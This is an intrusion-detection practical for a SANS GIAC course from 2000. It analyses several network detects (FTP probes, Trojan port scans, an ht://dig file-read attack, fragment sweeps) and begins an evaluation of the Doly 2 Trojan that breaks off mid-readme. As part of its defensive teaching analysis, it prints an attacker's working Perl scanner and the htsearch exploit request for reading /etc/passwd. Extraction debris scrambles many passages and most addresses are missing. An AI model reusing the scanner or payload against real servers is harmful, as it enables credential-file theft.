Interested in learning more? Global Information Assurance Certification Paper. Copyright SANS Institute Author Retains Full Rights

Transcription

1 Global Information Assurance Certification Paper Copyright SANS Institute Author Retains Full Rights This paper is taken from the GIAC directory of certified professionals. Reposting is not permited without express written permission. Interested in learning more? Check out the list of upcoming events offering "Intrusion Detection In-Depth (Security 503)" at

2 SANS GIAC Intrusion Detection Curriculum Parliament Hill 2000 Assignment 1 Detect 1 Aug 27 11:12:26 seeker tcplogd: "Syn probe" super.biat.ch [ ]:[3368]->seeker[ ]:ftp 1. Source of trace My network. 2. Detect was generated by: UNIX TCPLog. 3. Probability the source address was spoofed It is highly probable this address was spoofed. A TCP connection was initiated to a high port (5001) in order to observe the returned reset Time-To-Live (TTL). In this case the TTL returned is 239 and the TTL intercepted by Snort was 26. seeker:~# tcpdump -v -n ip and host tcpdump: listening on eth0 15:09: > : S : (0) win <mss 1460,sackOK,timestamp [ tcp]> (DF) [tos 0x10] (ttl 64, id 22794) 15:09: > : R 0:0(0) ack win 0 [tos 0x10] (ttl 239, id 7138) Other indications it is spoofed is the original SYN-FIN packet has a TTL of 26 with a window size of 1028: 11:12: > : SF : (0) win 1028 (ttl 26, id 39426) A second SYN packet has a TTL of 48 with a window size of 32120: 11:12: > : S : (0) win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 48, id 32630) Key These fingerprint two concurrent = AF19 connections FA27 2F94 have 998D different FDB5 DE3D flags, TTL, F8B5 packet 06E4 A169 ID #, and 4E46 window size which clearly shows that two different hosts are involved. The first trace shows a WIN size of 1028 with a TTL of 26 and a packet ID of This trace doesn't contain enough information to accurately determine the type of OS used. Guy Bruneau Page 1 of 1

3 However, the second trace shows a WIN size of with a TTL of 48 and a packet ID By applying passive OS Fingerprinting to the second trace using the information from the configuration file of the p0f tool ( we can determine with accuracy that this computer is probably running some flavor of Linux. 4. Description of attack: The probes are against TCP port 21 (FTP), and in this case the source is probably trying to create a buffer overflow. Note that the source and destination of the initial probe are the same indicating crafted packets. The most likely CVE is a candidate under review known as CAN "wu-ftpd FTP daemon allows any user and password combination". 5. Attack mechanism: The purpose of this scan is to determine the presence and availability of the FTP service, which would be preparatory to an attack on FTP. 6. Correlation: The following correlating data is included, providing a complete picture of the activity initially detected by TCPLogd daemon. UNIX Snort Syslog alert Aug 27 11:12:21 seeker snort[11207]: spp_portscan: PORTSCAN DETECTED from (STEALTH) Aug 27 11:12:21 seeker snort[11207]: SCAN-SYN FIN: :21 -> :21 Aug 27 11:14:05 seeker snort[11207]: spp_portscan: portscan status from : 2 connections across 1 hosts: TCP(2), UDP(0) STEALTH Aug 27 11:15:56 seeker snort[11207]: spp_portscan: End of portscan from : TOTAL time(0s) hosts(1) TCP(2) UDP(0) STEALTH SNORT Portscan Aug 27 11:12: :21 -> :21 SYNFIN **SF**** Aug 27 11:12: :3368 -> :21 SYN **S***** SNORT packet dump [**] SCAN-SYN FIN [**] 08/27-11:12: :21 -> :21 TCP TTL:26 TOS:0x0 ID:39426 **SF**** Seq: 0x2B3B7BD2 Ack: 0x39753B5E Win: 0x404 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Guy Bruneau Page 2 of 1

4 Someone else blocked it later with IPChains Aug 27 11:22:17 elvisman kernel: Packet log: input DENY eth0 PROTO= : :21 L=40 S=0x00 I=39426 F=0x0000 T=27 SYN Shadow log dump using asctcpdump filter Initial SYN-FIN probe (note TTL & packet ID). Note the source and destination ports. 11:12: > : SF : (0) win 1028 (ttl 26, id 39426) a a06 81a5 d1cc 15f9 E..(... c0a8 1e b3b 7bd b5e.p...+;{.9u;^ aaa P... Initial Key response fingerprint from = AF19 SYN-FIN FA27 2F94 probe 998D with FDB5 a SYN-ACK DE3D F8B5 06E4 A169 4E46 11:12: > : S : (0) ack win <mss 536> (DF) (ttl 64, id 43794) c ab a91 c0a8 1e01 E..,..@.@...p.. d1cc 15f c b3b 7bd3...).9+;{ ed0 0f1f `.>... This is a reset from the real host verified earlier (note TTL & different packet ID) 11:12: > : R : (0) win 0 (ttl 239, id 32627) f ef06 c733 d1cc 15f9 E..(.s c0a8 1e b3b 7bd p...+;{ f P... This is a second attempt (SYN only) from a different host most likely the real source (note TTL & different packet ID). Note the source and destination ports. 11:12: > : S : (0) win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 48, id 32630) c 7f d d1cc 15f9 E..<.v@.0.F... c0a8 1e01 0d e4 a62e p...(..(... a002 7d78 da9d b a..}x s... 11:12: > : S : (0) ack win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 64, id 43795) c ab a80 c0a8 1e01 E..<..@.@...p.. d1cc 15f d28 0c50 e858 28e4 a62f...(.p.x(../ a012 3ebc b a..>..S f 091e /...s... Authorization service check 11:12: > : S : (0) win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 64, id 43807) c ab1f a74 c0a8 1e01 E..<..@.@..t.p.. d1cc 15f9 0b d44 a c.q.D.Q... a002 3ebc b75a b a..>..Z... Key 072f fingerprint 0b2f 0000 = AF FA F94 998D FDB5././... DE3D F8B5 06E4 A169 4E46 Guy Bruneau Page 3 of 1

5 11:12: > : S : (0) ack win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 48, id 32767) c 7fff d1cc 15f9 E..<..@.0.E... c0a8 1e b63 292e 0b29 0d44 a152.p...q.c)..).d.r a012 7d78 b3a b a..}x f 072f 0b2f /./... Port verification and exchange 11:12: > : P 1:10(9) ack 1 win <nop,nop,timestamp > (DF) (ttl 64, id 43809) d ab a71 c0a8 1e01 E..=.!@.@..q.p.. d1cc 15f9 0b d44 a e 0b2a...c.q.D.R)..* ebc 505c a 072f 0b3a..>.P\.../.: f c32 310d 0a ,21.. Indication the user is working from a root account 11:12: > : P 1:35(34) ack 10 win <nop,nop,timestamp > (DF) (ttl 48, id 32769) d1cc 15f9 E..V..@.0.Ex... c0a8 1e b63 292e 0b2a 0d44 a15b.p...q.c)..*.d.[ d78 ffdc a b..}x f 0b3a c a20./.:3368, 21 : a 204f a USERID : OTHER : 726f 6f74 0d0a root.. 11:12: > : F 10:10(0) ack 35 win <nop,nop,timestamp > (DF) (ttl 64, id 43811) ab a78 c0a8 1e01 E..4.#@.@..x.p.. d1cc 15f9 0b d44 a15b 292e 0b4c...c.q.D.[)..L ebc 20d a 072f 0b47..>..../.G b... 11:12: > : F 35:35(0) ack 11 win <nop,nop,timestamp > (DF) (ttl 48, id 32771) d1cc 15f9 E..4..@.0.E... c0a8 1e b63 292e 0b4c 0d44 a15c.p...q.c)..l.d.\ d78 e a a9..}x f 0b47./.G 11:12: > : F 1:1(0) ack 1 win <nop,nop,timestamp > (DF) (ttl 48, id 32873) d1cc 15f9 E..4.i@.0.E2... c0a8 1e01 0d e4 a62f 0c50 e859.p...(..(../.p.y d a a67..}x.g...g 072f 091e./.. 11:12: > : F 1:1(0) ack 2 win <nop,nop,timestamp > (DF) (ttl 64, id 43815) ab a74 c0a8 1e01 E..4.'@.@..t.p.. d1cc 15f d28 0c50 e859 28e4 a630...(.p.y( ebc 3b a 072f 0d3c..>.;.../.< a67...g 7. Evidence of active targeting: Key It doesn't fingerprint appear = to AF19 be active FA27 targeting. 2F94 998D The FDB5 probes DE3D appear F8B5 to be 06E4 random A169 (packet 4E46 ID # not consistent), however, the attacker appears to be trying different methods to gain information. Initially using a SYN-FIN packet, upon the receipt of a SYN-ACK, another SYN packet is sent which appears to be a different host, (see TTL) using the same IP to Guy Bruneau Page 4 of 1

6 connect to the FTP server thus appearing like a legitimate user. 8. Severity: (System criticality + Attack lethality) - (System countermeasures + Network Countermeasures) = Severity (4 + 5) - (5 + 3) = 1 System criticality: 4 - FTP service running Attack lethality: 5 - The goal is to probably create a buffer overflow to gain root access System countermeasures: 5 - All patches have been applied and TCP wrapper is installed Network Countermeasures: 3 - Permissive firewall but relying on TCP wrapper for Key controlled fingerprint access. = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46 9. Defensive recommendation: Defenses are fine, attack was blocked by TCP wrapper limiting access to a few IPs. The system is also protected with multiple layers of Intrusion Detection Systems. Insuring that the patches are kept up-to-date is also a must to provide a stable FTP service. 10. Write a question that is based on the trace and your analysis with your answer. 11:12: > : SF : (0) win 1028 (ttl 26, id 39426) a a06 81a5 d1cc 15f9 E..(... c0a8 1e b3b 7bd b5e.p...+;{.9u;^ aaa P... 11:12: > : S : (0) ack win <mss 536> (DF) (ttl 64, id 43794) c ab a91 c0a8 1e01 E..,..@.@...p.. d1cc 15f c b3b 7bd3...).9+;{ ed0 0f1f `.>... 11:12: > : R : (0) win 0 (ttl 239, id 32627) f ef06 c733 d1cc 15f9 E..(.s c0a8 1e b3b 7bd p...+;{ f P... 11:12: > : S : (0) win <mss 1460,sackOK,timestamp ,nop,wscale 0> (DF) (ttl 48, id 32630) c 7f d d1cc 15f9 E..<.v@.0.F... c0a8 1e01 0d e4 a62e p...(..(... a002 7d78 da9d b a..}x s... Using the following traces, what is the most accurate answer? Key a) A denied fingerprint connection = AF19 to FA27 a FTP 2F94 server 998D FDB5 DE3D F8B5 06E4 A169 4E46 b) A spoofed address attempting to connect to server c) A SYN-FIN probe to a FTP server followed by normal SYN connection. Indication of a spoofed address. Guy Bruneau Page 5 of 1

7 d) A SYN-FIN probe to a FTP server Answer: C Detect 2 Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26231 F=0x4000 T=61 SYN (#54) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26233 F=0x4000 T=61 SYN (#59) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26235 F=0x4000 T=61 SYN (#53) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12345 L=60 S=0x00 I=26236 F=0x4000 T=61 SYN (#57) Aug Key 1 13:49:04 fingerprint seeker = AF19 kernel: FA27 Packet 2F94 log: 998D inp FDB5 DENY eth0 DE3D PROTO=6 F8B : E4 A169 4E :12346 L=60 S=0x00 I=26237 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker tcplogd: "Syn probe" [ ]:[2461]- >seeker[ ]:[20034] Aug 1 13:49:04 seeker tcplogd: "Syn probe" [ ]:[2463]- >seeker[ ]:[31337] Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26239 F=0x4000 T=61 SYN (#54) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26240 F=0x4000 T=61 SYN (#59) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26241 F=0x4000 T=61 SYN (#53) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12345 L=60 S=0x00 I=26242 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26243 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26244 F=0x4000 T=61 SYN (#54) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26245 F=0x4000 T=61 SYN (#59) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26246 F=0x4000 T=61 SYN (#53) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12345 L=60 S=0x00 I=26247 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26248 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26249 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12345 L=60 S=0x00 I=26250 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26251 F=0x4000 T=61 SYN (#53) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26252 F=0x4000 T=61 SYN (#59) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26253 F=0x4000 T=61 SYN (#54) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26254 F=0x4000 T=61 SYN (#57) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12345 L=60 S=0x00 I=26255 F=0x4000 T=61 SYN (#57) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26256 F=0x4000 T=61 SYN (#53) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26257 F=0x4000 T=61 SYN (#59) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26258 F=0x4000 T=61 SYN (#54) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26259 F=0x4000 T=61 SYN (#57) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= :2488 Guy Bruneau Page 6 of 1

8 :12345 L=60 S=0x00 I=26260 F=0x4000 T=61 SYN (#57) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26261 F=0x4000 T=61 SYN (#53) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26262 F=0x4000 T=61 SYN (#59) Aug 1 13:49:05 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26263 F=0x4000 T=61 SYN (#54) 1. Source of trace My network. 2. Detect was generated by: UNIX TCPLog and Linux IPChains firewall. A breakdown of the IPChains firewall log can be found at: 3. Probability the source address was spoofed This address is the true source. A TCP connection was initiated to a high port (5001) in order to observe the returned reset TTL. In this case the TTL returned is 58 and the TTL intercepted by Shadow is 61 (see section 6 for correlation). This minor difference between the TTL's is too insignificant, therefore could be a result of asymmetric routing. tcpdump -v -n ip and host tcpdump: listening on eth0 21:01: > : S : (0) win <mss 1460,sackO K,timestamp [ tcp]> (DF) [tos 0x10] (ttl 64, id 58909) 21:01: > : R 0:0(0) ack win 0 (DF) [tos 0x10] (ttl 58, id 51503) 4. Description of attack: This series of probes are targeting well-known Trojan ports. CVE candidate CAN is under review to represent hacker utilities or Trojan Horses when they are installed on a system, e.g. NetBus, Back Orifice, Rootkit, etc. 5. Attack mechanism: At 13:48:51 the scanner proceeded with a ping reconnaissance to assess availability of the Key target fingerprint which is followed = AF19 FA27 at 13:49:04 2F94 998D (13 seconds FDB5 later) DE3D by F8B5 the scan 06E4 probing A169 4E46 for 7 well known Trojans. Guy Bruneau Page 7 of 1

9 The Trojans probes are as follows: Port Description 1243 SubSeven 666 Attack FTP NetBus NetBus NetBus Pro SubSeven Netpatch 6. Correlation: The following data is included to correlate the activity initially detected by IPChains firewall and the TCPLog daemon. Snort lightweights IDS and Shadow confirmed the Trojan scan against the Seeker site. In this first instance, Snort only detects a ping request but doesn't detect any port connections. Most of Snort's rules are built to alarm only after the Trojan scanner actually connects with a server. However, Shadow shows that a ping request (reconnaissance) was initiated 13 seconds before the actual port probes, followed by a wide spectrum sweep of this network. Snort log Aug 1 13:48:51 seeker snort[18247]: IDS162 - PING Nmap2.36BETA: > Guy Bruneau Page 8 of 1

10 Shadow logs 7. Evidence of active targeting: The only evidence of possible active targeting is that the source port numbers are going up one at the time therefore indicating it can only scan one host at a time. This could possibly mean a search for active Trojans throughout the whole class C. 8. Severity: (System criticality + Attack lethality) - (System countermeasures + Network Countermeasures) = Severity (5 + 1) + (5 + 5) = - 4 System criticality: 5 - Firewall Attack lethality: 1 - Attack is very unlikely to succeed System countermeasures: 5 - Modern operating system (Linux) Network Countermeasures: 5 - Restrictive firewall against well known Trojans 9. Defensive Key fingerprint recommendation: = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46 Defenses are fine. Attack was blocked by the firewall and a Shadow Intrusion Detection System is in place to collect the traffic for further analysis. Guy Bruneau Page 9 of 1

11 The server being probed is using Linux as Operating System (OS) and remains unaffected by the Trojans it is probing for. 10. Write a question that is based on the trace and your analysis with your answer. Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :1243 L=60 S=0x00 I=26231 F=0x4000 T=61 SYN (#54) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :27374 L=60 S=0x00 I=26233 F=0x4000 T=61 SYN (#59) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :666 L=60 S=0x00 I=26235 F=0x4000 T=61 SYN (#53) Aug Key 1 13:49:04 fingerprint seeker = AF19 kernel: FA27 Packet 2F94 log: 998D inp DENY FDB5 DE3D eth0 PROTO=6 F8B5 06E :2465 A169 4E :12345 L=60 S=0x00 I=26236 F=0x4000 T=61 SYN (#57) Aug 1 13:49:04 seeker kernel: Packet log: inp DENY eth0 PROTO= : :12346 L=60 S=0x00 I=26237 F=0x4000 T=61 SYN (#57) In the following trace, which of the following Internet protocol is being targeted? a) TCP b) IGMP c) UDP d) ICMP Answer: A Detect 3 Name Sev Src Addr Dst Addr SrcPt DstPt Date Count SigID SubSig Details www cgi-bin Sun Jun 25 11:16: /etc/passwd www cgi-bin Sun Jun 25 11:16: /etc/passwd www cgi-bin Sun Jun 25 11:16: /etc/passwd www cgi-bin Sun Jun 25 11:07: /etc/passwd [...] Random scanning of addresses mostly in subnet 1. Source of trace Work 2. Detect was generated by: Cisco Secure IDS. More information is available for this signature at: Guy Bruneau Page 10 of 1

12 3. Probability the source address was spoofed The address wasn't spoofed. This was later confirmed by the ISP. 4. Description of attack: This attack scans web servers for cgi-bin /etc/passwd exposure using an old HTDIG vulnerability. CVE was assigned to this HTDIG problem. 5. Attack mechanism: The computer involved ( ) was a Linux server with kernel It had been used by a cracker to scan a large number of addresses. The perl script used was "ht.pl" Key and it fingerprint tried to exploit = AF19 a bug FA27 in an 2F94 old 998D HTDIG FDB5 version DE3D to obtain F8B5 06E4 the file A169 "/etc/passwd" 4E46 from a list of IPs. The attack worked by sending an http get command to a web server hoping to retrieve information that would be otherwise restricted to the htsearch engine. In this case, if the target system stored encrypted passwords in the passwd file rather than a shadow file, retrieving this file would allow the cracker to attempt to decrypt the passwords remotely with a tool such as crack 5. However, if the passwords were stored in a shadow file, the /etc/passwd file would still hold valuable reconnaissance information by providing a list of active users and dormant accounts on the target. The following information was supplied by the ISP. The perl script process doesn't appear with the "ps" command. It would indicate the "ps" binary was cracked. The perl script, and all related files were located in "/usr/bin/. " (dot-dot-space), and "ls -a" doesn t show either. So, "ls" binary was only 140 KB, which confirms the presence of a rootkit on the server. He couldn t confirm how the cracker had gained root privilege to install the rootkit but could confirm the rootkit had been in place for about two months. The way htsearch works Htdig retrieves HTML documents using the HTTP protocol and gathers information from these documents which can later be used to search these documents. This program can be referred to as the search robot.. 1 However, htsearch is the actual search engine of the ht://dig search system. It is a CGI program that is expected to be invoked from an HTML form. It will accept both the GET and POST methods of passing data to the CGI program. 1 Here is how the CVE board has described it The htdig (ht://dig) CGI program htsearch allows remote attackers to read arbitrary files by enclosing the file name with backticks (`) in parameters to htsearch Correlation: Here we have a copy of the script used to randomly scan the class C Using the Cisco Secure IDS log, we have a readout of the actual traffic obtained by the IDS (Hex dump). Included below is a copy of the perl script (ht.pl) used to perform the scan. Guy Bruneau Page 11 of 1

13 This htdig vulnerability was also mentioned in the following security lists: BUGTRAQ: ht://dig remote information exposure FREEBSD:FreeBSD-SA-00:06 DEBIAN: remote users can read files with webserver uid TURBO:TLSA This vulnerability is also listed on SANS' "Top 10" list, under number 2: "Vulnerable CGI programs and application extensions installed on web servers." at Here is a Cisco Secure IDS breakout of the HEX dump 4, ,2000/06/25,15:16:44,2000/06/25,11:16:44,10008,6,5000,OUT,IN,4,3201,1,TCP/IP, , ,5902,80, ,/etc/passwd,get /cgi-bin/htsearch?exclude=%60etc/passwd%60 HTTP/1.0 host: user-agent: mozzilla/4.0 (compatible; MSIE 4.01; Windows 98) Here is a copy of the perl script used to conduct the scan (provided by the ISP) #/usr/bin/perl use LWP::UserAgent; my $ListFile = ""; print "HTDIG Scanner V1.0 by Y2K, y2k\@rootaccess.de\n\n"; print "Enter URL List File : "; #$ListFile = <STDIN>; $ListFile = "192.ip"; if($listfile =~ /\n/) { chop($listfile); } print "\n"; if (!open (URLS,"<$ListFile")) { print "File not found!\n"; exit(1); } $ua = new LWP::UserAgent; $ua->agent("mozilla/4.0 (compatible; MSIE 4.01; Windows 98)"); $ua->timeout(1); while Key (<URLS>) fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46 { $IP = $_; if($ip =~ /\n/) { chop($ip); } Guy Bruneau Page 12 of 1

14 print $IP,"..."; $req = new 'GET' => " $erg = $ua->request($req)->as_string; if ($erg =~ /Could not connect/) { print "Cannot connect to host on Port 80.\n"; } elsif (!($erg =~ /200 OK/)) { print "Error in HTTP request.\n"; } else { print "HTTP request ok...saving file.\n"; open(file, ">$IP"); print FILE $erg; close(file); } } close(file); 7. Evidence of active targeting: There is evidence of active targeting. By looking closely at the ht.pl script in item 6, you will notice the variable $ListFile = "192.ip"; which could indicate a previous network reconnaissance by the attacker. When the script was run against the class C, the attacker already had a file containing a list of addresses he was interested in probing. 8. Severity: (System criticality + Attack lethality) - (System countermeasures + Network Countermeasures) = Severity (5 + 5) - (5 + 4) = 1 System criticality: 5 - Web Servers Attack lethality: 5 - If successful, attacker could gain root access. System countermeasures: 5 - Modern operation system with all the patches applied Network Countermeasures: 4 - Modern Intrusion Detection Systems and restriction at the router. 9. Defensive recommendation: Defenses were fine because the attack was ineffective (htdig isn't used) and was detected by multiple layers of Intrusion Detection Systems. 10. Write a question that is based on the trace and your analysis with your answer. Name Sev Src Addr Dst Addr SrcPt DstPt Date Count SigID SubSig Details www cgi-bin Sun Jun 25 11:16: /etc/passwd www cgi-bin Sun Jun 25 11:16: /etc/passwd On which Operating System (OS) will you find an /etc/passwd file? Guy Bruneau Page 13 of 1

15 a) Windows NT 4.0 b) MacOS c) Windows Millennium (ME) d) Solaris Answer: D Detect 4 Name Sev Src Addr Dst Addr SrcPt DstPt Date Count SigID SubSig Details IP Fragment Attack Fri Sep 8 07:41: TCP FRAG SYN Port Sweep Fri Sep 8 07:41: Source of trace Work 2. Detect was generated by: Cisco Secure IDS. More information is available for this signature at: 3. Probability the source address was spoofed There is no indication this address was spoofed. Further analysis concludes it was the true source. 4. Description of attack: The fragmentation of TCP packets allows for the communication of malicious code or remote commands, which could not be deciphered without reassembling the fragments. This technique is used to bypass Intrusion Detection Systems (IDS) or a certain number of firewalls. In order to perform a complete analysis of these fragmented packets, an IDS such as Shadow is needed to examine the payload. Different implementations take different approaches in deciding when it is safe to use large datagrams. However, 576 bytes is a "safe" size, which every implementation must support. 5. Attack mechanism: When IP packets are broken into fragments, only the first packet contains complete header information. Many routers will filter packets based on this header information. Guy Bruneau Page 14 of 1

16 Because there is not enough information in the secondary fragments, many routers let the packets through. Packets can be written and fragmented so that they can be successfully reassembled at the destination without the initial fragment. ull rig ht s. In this case we have a complete IP header and the "tool" is creating a significant numbers of SYN fragments in order to bypass the Intrusion Detection System and the firewall. The technique could eventually overwhelm the target and crash it if not properly patched and configured. The fragmented packets displayed here are truncated at byte 16. tai ns f The tool used in this attack was probably Nmap. or re 6. Correlation: The following is an extract from Shadow logs that which correlates the information collected by the Cisco Secure IDS. th ASCTcpdump replay of some of the packets SA NS In sti tu te , Au 07:42: truncated-tcp 16 (frag 42744:16@0+) (ttl 36) a6f bb c0a8 a3a6 E..$...$.d..p.. c0a8 df9e ce13 05e a k...a! P... 07:42: truncated-tcp 16 (frag 38451:16@0+) (ttl 36) c0a8 a3a6 E..$.3.$.u..p.. c0a8 df9e ce13 054f a k...O.a! P... 07:42: > : icmp: ip reassembly time exceeded [tos 0xc0] (ttl 64, id 50685) 45c c5fd c0a8 df02 E..T...@.Ig.k.. c0a8 a3a6 0b01 abb p...E..$ c6c ef c0a8 a3a6 c0a8 df9e...$.d..p...k.. ce12 05b6 391d e b...P :42: > : icmp: ip reassembly time exceeded [tos 0xc0] (ttl 64, id 50686) 45c c5fe c0a8 df02 E..T...@.If.k.. c0a8 a3a6 0b01 a p...v...E..$ b d c0a8 a3a6 c0a8 df9e.&.$.s..p...k.. ce d e b...P s The following data was replayed through Snort to correlates the fragmentation attacks. Snort rules used in the detect: Key icmp fingerprint = AF19 FA27 998D FDB5 DE3D 06E4 A169 4E alert any any <> any any 2F94 (msg:"ping-icmp Time F8B5 Exceeded"; itype:11;) A simple description of "Time Exceeded" could be described as if a host reassembling a Guy Bruneau SANS Institute Page 15 of 1 As part of GIAC practical repository. Author retains full rights.

17 fragmented datagram cannot complete the reassembly due to missing fragments within its time limit, it discards the datagram, and it may send a time exceeded message. 2 - preprocessor minfrag: 128 The minfrag preprocessor plugin checks for fragmented packets. If the packet is a fragment and its size is less than or equal to the threshold value, it generates the following alert: Tiny Fragments - Possible Hostile Activity. In this example, the minfrag preprocessor will generate an alert on all fragments of 128 bytes or less. Snort Alert log [**] Tiny Fragments - Possible Hostile Activity [**] 09/08-07:42: > TCP TTL:36 TOS:0x0 ID:42744 MF Frag Offset: 0x0 Frag Size: 0x10 [**] Tiny Fragments - Possible Hostile Activity [**] 09/08-07:42: > TCP TTL:36 TOS:0x0 ID:38451 MF Frag Offset: 0x0 Frag Size: 0x10 [**] PING-ICMP Time Exceeded [**] 09/08-07:42: > ICMP TTL:64 TOS:0xC0 ID:50685 TTL EXCEEDED [**] PING-ICMP Time Exceeded [**] 09/08-07:42: > ICMP TTL:64 TOS:0xC0 ID:50686 TTL EXCEEDED Snort - Application Layer Dump =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] Tiny Fragments - Possible Hostile Activity [**] 09/08-07:42: > TCP TTL:36 TOS:0x0 ID:42744 MF Frag Offset: 0x0 Frag Size: 0x10 CE E A a!...P... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] Tiny Fragments - Possible Hostile Activity [**] 09/08-07:42: > TCP TTL:36 TOS:0x0 ID:38451 MF Frag Key Offset: fingerprint 0x0 = AF19 Frag FA27 Size: 2F940x10 998D FDB5 DE3D F8B5 06E4 A169 4E46 CE F A O.a!...P... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Guy Bruneau Page 16 of 1

18 7. Evidence of active targeting: This attack was directed to a specific host ( ). The host sent over 100 fragments over a period of 4 minutes to in the class C. 8. Severity: (System criticality + Attack lethality) - (System countermeasures + Network Countermeasures) = Severity (5 + 4) - (5 + 3) = 1 System criticality: 5 - Firewall Attack lethality: 4 - Could result in a complete Denial of Service (DoS) System countermeasures: 5 - Modern operating system, all patches applied Network Countermeasures: 3 - Restrictive firewall and modern IDS. 9. Defensive recommendation: Defenses were fine because the host rejected all packets. Multiple layers of Intrusion Detection Systems also detected it. For fragmented packets coming from outside this network, we may want to consider discarding them at the router. 10. Write a question that is based on the trace and your analysis with your answer. 07:42: truncated-tcp 16 (frag 42744:16@0+) (ttl 36) a6f bb c0a8 a3a6 E..$...$.d..p.. c0a8 df9e ce13 05e a k...a! P... Using the following trace, which of the following answers is the source address in Hex format? a) 64bb c0a8 b) c0a8 df9e c) c0a8 a3a6 d) bb Answer: c Assignment 2 - Evaluate an Attack 1. This Trojan can be downloaded at: 2. Description on how it works Guy Bruneau Page 17 of 1

19 When the Doly 2 scanner is unleash on a network, it will attempt to connect to the following ports in the following order: 3456, 4567, 5678, 6789, 7890, 9182, 8374, 2345, 7654 and (4 times each). However, if a computer is infected with the Trojan (server installed), it attempts to connect to the same ports in the same order: 3456, 4567, 5678, and connects on The default port for Doly 2 is It is also interesting to note the scanner looks for so many ports. Observe the port's increment order. It is possible to assume it may be a way to fool Intrusion Detection tools or the analyst by raising the noise floor with a bunch of random ports. This is quite a change from the previous version, which used a different set of ports. The previous versions used the following default ports: version 1.1 & 1.2 = 1011, version 1.5 = 1015, version 1.6 & 1.7 = 1016, version 1.35 = 1035 ( In order to install the Trojan correctly on the target, the following two files must be installed: msvbvm60.dll can be downloaded at: a required dll for programs written in Visual Basic 6.0. This information provides an excellent clue that the Trojan was probably written in Visual Basic with version 6.0. The second file needed to complete the installation is mswinsck.ocx. It can be downloaded at: If those two files are required and not installed by default on Windows 95 and Windows 98, it indicates the chances for this Trojan to be successfully installed are very low. The file msvbvm60.zip is 731KB and file mswinsck.ocx is 108KB. If both were package with the server (106KB) it would increase the chances of being discovered over , the most common way of distributing Trojans. When you look over the TCPDump traces, note the four attempts to connect to the server are done for every port until a connection is established. This is the readme file included with the final release Doly v2 Beta General stuff you need to know: Server is SAFE for local install! (You may run it on your computer and he will not install him self or do any damage) - If you want to see the server Action Just run the sever with the command of 